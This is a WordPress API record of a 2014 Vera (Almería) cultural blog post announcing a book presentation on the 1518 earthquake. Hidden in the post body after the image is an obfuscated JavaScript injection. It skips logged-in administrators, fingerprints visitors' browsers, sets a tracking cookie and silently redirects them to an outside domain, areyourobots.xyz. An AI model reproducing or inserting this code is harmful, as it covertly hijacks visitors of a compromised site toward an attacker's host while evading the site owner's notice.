{"id":703,"date":"2014-11-06T11:33:18","date_gmt":"2014-11-06T11:33:18","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=703"},"modified":"2018-01-15T13:55:19","modified_gmt":"2018-01-15T13:55:19","slug":"presentacion-del-libro-el-terremoto-de-1518-en-vera-y-su-comarca-almeria","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/11\/06\/presentacion-del-libro-el-terremoto-de-1518-en-vera-y-su-comarca-almeria\/","title":{"rendered":"PRESENTACI\u00d3N DEL LIBRO \u00abEL TERREMOTO DE 1518 EN VERA Y SU COMARCA (ALMER\u00cdA)\u00bb"},"content":{"rendered":"<p>El domingo d\u00eda 9 de noviembre de 2014 se presentar\u00e1 en el Convento de la Victoria de Vera, calle Juan Anglada, a las 19:30 horas, el libro <em>El terremoto de 1518 en Vera y su comarca (Almer\u00eda).<\/em><\/p>\n<p><!--more--><\/p>\n<p>El Excmo. Ayuntamiento de Vera y Arr\u00e1ez Editores les invitan a la presentaci\u00f3n de esta obra. En el acto intervendr\u00e1n: Mar\u00eda Manuela Caparr\u00f3s Flores, Concejala de Cultura, Juan Grima Cervantes, Profesor de Historia en el IES Alyanub de Vera, Manuel Espinar Moreno, Catedr\u00e1tico de Historia Medieval de la Universidad de Granada, y Francisco Vidal S\u00e1nchez, Profesor de Geof\u00edsica de la Universidad de Granada.<\/p>\n<p>Esperamos su asistencia. Gracias.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/11\/presentaci\u00f3n-libro-terremoto-1518.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-704\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/11\/presentaci\u00f3n-libro-terremoto-1518-209x300.jpg\" alt=\"presentaci\u00f3n libro terremoto 1518\" width=\"209\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/11\/presentaci\u00f3n-libro-terremoto-1518-209x300.jpg 209w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/11\/presentaci\u00f3n-libro-terremoto-1518-713x1024.jpg 713w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/11\/presentaci\u00f3n-libro-terremoto-1518.jpg 892w\" sizes=\"(max-width: 209px) 100vw, 209px\" \/><\/a><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El domingo d\u00eda 9 de noviembre de 2014 se presentar\u00e1 en el Convento de la Victoria de Vera, calle Juan Anglada, a las 19:30 horas, el libro El terremoto de 1518 en Vera y su comarca (Almer\u00eda).<\/p>\n","protected":false},"author":7,"featured_media":704,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,109],"tags":[270],"class_list":["post-703","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-historia","tag-s-xvi"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=703"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/703\/revisions"}],"predecessor-version":[{"id":1681,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/703\/revisions\/1681"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/704"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}